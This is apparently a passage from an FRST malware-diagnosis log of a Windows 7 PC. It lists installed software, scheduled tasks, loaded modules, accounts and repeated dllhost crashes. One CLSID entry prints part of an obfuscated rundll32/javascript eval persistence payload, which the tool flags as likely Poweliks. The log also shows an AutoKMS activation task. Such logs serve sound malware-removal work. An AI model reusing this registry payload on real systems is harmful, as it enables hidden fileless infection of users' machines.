VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VMware vSphere Client 4.1 (HKLM-x32\...\{A0B433B1-941D-46F5-AE59-286263534232}) (Version: 4.1.0.12319 - VMware, Inc.)
VMware vSphere Client 5.0 (HKLM-x32\...\{04805AB6-F757-496A-8D56-37A0FC5FF6F3}) (Version: 5.0.0.29542 - VMware, Inc.)
VMware vSphere Client 5.5 (HKLM-x32\...\{4CFB0494-2E96-4631-8364-538E2AA91324}) (Version: 5.5.0.4216 - VMware, Inc.)
VNC Enterprise Edition E4.6.1 (HKLM\...\RealVNC_is1) (Version: E4.6.1 - RealVNC Ltd)
WordPerfect IFilter 32 bit (HKLM-x32\...\{1DF03ECE-6AF4-414E-B118-C316F151A9A2}) (Version: 1.2 - Corel Corporation)
WordPerfect IFilter 64 bit (HKLM\...\{1B45B85C-99E8-4523-8FB3-0248B3DECFC8}) (Version: 1.2 - Corel Corporation)
WordPerfect Office X6 - Common Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Common Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - IPM (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Lightning Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Lightning Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Oxford (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Presentations Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Presentations Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Quattro Pro Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Quattro Pro Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Setup Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - System Files (x32 Version: 15.0 - Corel Corporation) Hidden
WordPerfect Office X6 - WordPerfect Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - WordPerfect Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - WT (x32 Version: 16.1 -  Corel Corporation) Hidden
WordPerfect Office X6 (HKLM-x32\...\_{26D6D2A4-F08A-4212-86E7-7F1F75033610}) (Version: 16.0.0.388 - Corel Corporation)
WordPerfect Office X6 (x32 Version: 16.0 - Corel Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\FileSyncApi64.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2014 20:13:11 Scheduled Checkpoint
24-01-2014 20:25:10 Installed Samsung Kies3
01-02-2014 08:00:03 Scheduled Checkpoint
06-02-2014 07:26:52 Installed iTunes
06-02-2014 07:48:27 Removed iTunes
06-02-2014 16:22:12 Installed iTunes
06-02-2014 18:14:12 Removed Apple Software Update
06-02-2014 18:22:49 Removed Apple Mobile Device Support
06-02-2014 18:24:53 Removed Bonjour
06-02-2014 18:26:12 Removed Apple Mobile Device Support
06-02-2014 18:32:10 Removed Apple Application Support
06-02-2014 18:35:08 Removed Apple Mobile Device Support
15-10-2014 10:00:13 Windows Update
15-10-2014 17:49:48 Installed VMware vSphere Client 5.5.
15-10-2014 22:15:42 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D2C7427-7C4A-4E2D-9F51-9773EF99BCD9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-08] (Google Inc.)
Task: {64A516D5-ED53-486F-92C3-8DD020353915} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-03-09] ()
Task: {A293FC85-67C4-4E67-98D8-DE60889B9A9B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-08] (Google Inc.)
Task: {B4845119-5600-4B32-BDF2-434D7ED2174E} - System32\Tasks\Backup Data => C:\Users\Rod\Desktop\backup.bat [2014-09-15] ()
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-01-21 23:56 - 2013-10-23 01:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-09-11 13:16 - 2014-09-11 13:14 - 00049152 ____N () C:\Program Files\D-Link\SharePort Plus\Spnuhelper.exe
2014-05-01 12:29 - 2014-05-01 12:29 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2014-09-11 13:16 - 2014-09-11 13:14 - 00304640 ____N () C:\Program Files\D-Link\SharePort Plus\Svlscapi.dll
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-08-23 00:42 - 2012-08-23 00:42 - 00435584 _____ () C:\Program Files (x86)\Common Files\Acronis\Home\ulxmlrpcpp.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00073352 _____ () C:\Program Files (x86)\Plex\Plex Media Server\zlib.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00195720 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libidn.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00840840 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libxml2.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00051848 _____ () C:\Program Files (x86)\Plex\Plex Media Server\soci_sqlite3-vc80-3_0.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00089224 _____ () C:\Program Files (x86)\Plex\Plex Media Server\soci_core-vc80-3_0.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 02100360 _____ () C:\Program Files (x86)\Plex\Plex Media Server\opencv_core249.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 01923720 _____ () C:\Program Files (x86)\Plex\Plex Media Server\opencv_imgproc249.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 07605400 _____ () C:\Program Files (x86)\Plex\Plex Media Server\avcodec-54.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 00202392 _____ () C:\Program Files (x86)\Plex\Plex Media Server\avutil-52.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 01453720 _____ () C:\Program Files (x86)\Plex\Plex Media Server\avformat-54.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00352920 _____ () C:\Program Files (x86)\Plex\Plex Media Server\swscale-2.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00507528 _____ () C:\Program Files (x86)\Plex\Plex Media Server\tag.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 08495240 _____ () C:\Program Files (x86)\Plex\Plex Media Server\WebKit.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 00952968 _____ () C:\Program Files (x86)\Plex\Plex Media Server\CFLite.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 01291400 _____ () C:\Program Files (x86)\Plex\Plex Media Server\JavaScriptCore.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 01038984 _____ () C:\Program Files (x86)\Plex\Plex Media Server\cairo.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00073352 _____ () C:\Program Files (x86)\Plex\Plex Media Server\zlib1.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2014-02-08 15:06 - 2012-01-18 17:35 - 00385024 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsConfig.dll
2014-02-08 15:06 - 2011-12-14 22:49 - 00233472 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsExtention.dll
2014-02-08 15:06 - 2003-03-26 19:46 - 00135168 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsImgIO.dll
2014-02-08 15:06 - 2010-08-24 17:56 - 00167936 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\SSsltsa.dll
2008-11-06 15:26 - 2008-11-06 15:26 - 04715848 ____R () C:\Program Files (x86)\TechSmith\Snagit 9\PDFNetC.dll
2014-06-01 02:08 - 2014-06-01 02:08 - 00035328 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-05-24 09:41 - 2014-05-24 09:41 - 00091648 _____ () C:\Program Files (x86)\FileZilla FTP Client\libgcc_s_sjlj-1.dll
2014-05-24 09:41 - 2014-05-24 09:41 - 00892416 _____ () C:\Program Files (x86)\FileZilla FTP Client\libstdc++-6.dll
2012-08-23 00:32 - 2012-08-23 00:32 - 01525120 _____ () C:\Program Files (x86)\Common Files\Acronis\Home\icudt38.dll
2014-10-17 11:53 - 2014-10-17 11:53 - 00098816 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32api.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00110080 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pywintypes27.dll
2014-10-17 11:53 - 2014-10-17 11:53 - 00364544 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pythoncom27.dll
2014-10-17 11:53 - 2014-10-17 11:53 - 00045568 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_socket.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 01160704 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_ssl.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00320512 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32com.shell.shell.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00713216 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_hashlib.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 01175040 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._core_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00805888 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._gdi_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00811008 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._windows_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 01062400 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._controls_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00735232 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._misc_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00128512 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_elementtree.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00127488 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pyexpat.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00557056 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pysqlite2._sqlite.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00007168 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\hashobjs_ext.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00087552 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_ctypes.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00119808 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32file.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00108544 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32security.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00018432 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32event.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00038912 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32inet.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00070656 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._html2.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00167936 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32gui.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00011264 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32crypt.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00027136 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_multiprocessing.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00686080 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\unicodedata.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00122368 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._wizard.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00010240 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\select.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00024064 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32pipe.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00025600 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32pdh.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00525640 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\windows._lib_cacheinvalidation.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00035840 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32process.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00017408 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32profile.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00022528 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32ts.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00078336 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._animate.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00045192 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_socket.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00028808 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_ssl.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00019080 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_hashlib.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00035976 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\simplejson\_speedups.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00836744 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\lxml\etree.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00062600 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libexslt.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00166024 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libxslt.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00192648 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\lxml\objectify.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00016520 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\select.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00056456 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\OpenSSL\crypto.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00018056 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\OpenSSL\rand.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00044680 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\OpenSSL\SSL.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00083080 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_ctypes.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00111752 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\pyexpat.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00692360 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\unicodedata.pyd
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2014-05-08 04:21 - 2014-05-08 04:21 - 02897280 _____ () C:\Program Files (x86)\Adobe\Acrobat 10.0\PDFMaker\Common\AdobePDFMakerX.dll
2013-02-14 16:46 - 2013-02-14 16:46 - 01044048 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll
2012-08-23 01:12 - 2012-08-23 01:12 - 00019840 _____ () C:\Program Files (x86)\Acronis\TrueImageHome\ti_managers_proxy_stub.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-153314184-682568810-1827683989-500 - Administrator - Disabled)
Guest (S-1-5-21-153314184-682568810-1827683989-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-153314184-682568810-1827683989-1002 - Limited - Enabled)
Parna (S-1-5-21-153314184-682568810-1827683989-1005 - Administrator - Enabled) => C:\Users\Parna
Rod (S-1-5-21-153314184-682568810-1827683989-1001 - Administrator - Enabled) => C:\Users\Rod
Sonos (S-1-5-21-153314184-682568810-1827683989-1004 - Limited - Enabled)
UpdatusUser (S-1-5-21-153314184-682568810-1827683989-1003 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/17/2014 11:55:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/17/2014 11:49:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000701e2
Faulting process id: 0x994
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:43:42 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000701e2
Faulting process id: 0x8b8
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:38:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000f01e2
Faulting process id: 0x908
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:33:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002101e2
Faulting process id: 0xbc4
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:27:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000d01e2
Faulting process id: 0x98c
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:22:30 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x001b01e2
Faulting process id: 0x598
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:17:12 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002001e2
Faulting process id: 0x66c
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:11:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x001001e2
Faulting process id: 0x5c4
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:07:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

System errors:
=============
Error: (10/17/2014 11:54:34 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/17/2014 11:52:25 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {1EF75F33-893B-4E8F-9655-C3D602BA4897}

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Provider Host service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Microsoft Office Sessions:
=========================
Error: (10/17/2014 11:55:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/17/2014 11:49:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000701e299401cfea3afb542a2eC:\Windows\syswow64\dllhost.exeunknown41f03f75-562e-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:43:42 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000701e28b801cfea3a3d80cdb4C:\Windows\syswow64\dllhost.exeunknown841ce2fc-562d-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:38:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000f01e290801cfea397fd8a761C:\Windows\syswow64\dllhost.exeunknownc673fd48-562c-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:33:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002101e2bc401cfea38c263923eC:\Windows\syswow64\dllhost.exeunknown08ffa786-562c-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:27:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000d01e298c01cfea3804f690f0C:\Windows\syswow64\dllhost.exeunknown4b92a638-562b-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:22:30 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005001b01e259801cfea3747280d67C:\Windows\syswow64\dllhost.exeunknown8dc422ae-562a-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:17:12 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002001e266c01cfea3689bd6d79C:\Windows\syswow64\dllhost.exeunknownd05982c1-5629-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:11:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005001001e25c401cfea35cc33ec58C:\Windows\syswow64\dllhost.exeunknown12d2d97a-5629-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:07:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

==================== Memory info ===========================

Processor: Intel® Core™2 Quad CPU Q9400 @ 2.66GHz
Percentage of memory in use: 30%
Total physical RAM: 6143.05 MB
Available physical RAM: 4247.59 MB
Total Pagefile: 12284.27 MB
Available Pagefile: 9325.32 MB
